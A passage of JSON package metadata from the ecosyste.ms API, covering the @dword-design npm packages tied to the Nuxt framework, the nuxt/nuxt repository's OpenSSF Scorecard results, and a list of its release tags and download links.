bose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dword-design%2Fnuxi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dword-design%2Fnuxi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dword-design%2Fnuxi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dword-design%2Fnuxi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dword-design%2Fnuxi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dword-design%2Fnuxi/codemeta","maintainers":[{"uuid":"dword-design","login":"dword-design","name":null,"email":"info@sebastianlandwehr.com","url":null,"packages_count":330,"html_url":"https://www.npmjs.com/~dword-design","role":null,"created_at":"2023-03-01T16:27:00.560Z","updated_at":"2023-03-01T16:27:00.560Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/dword-design/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":6466428,"name":"@dword-design/nuxt-kit","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"dword-design","versions_count":1,"first_release_published_at":"2023-03-03T17:29:47.487Z","latest_release_published_at":"2023-03-03T17:29:47.487Z","latest_release_number":"0.1.0","last_synced_at":"2026-05-11T01:23:04.158Z","created_at":"2023-03-03T18:51:31.851Z","updated_at":"2026-05-11T01:23:04.158Z","registry_url":"https://www.npmjs.com/package/@dword-design/nuxt-kit","install_command":"npm install @dword-design/nuxt-kit","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.1.0"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29414277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T06:24:03.484Z","status":"ssl_error","status_checked_at":"2026-02-13T06:23:12.830Z","response_time":78,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2F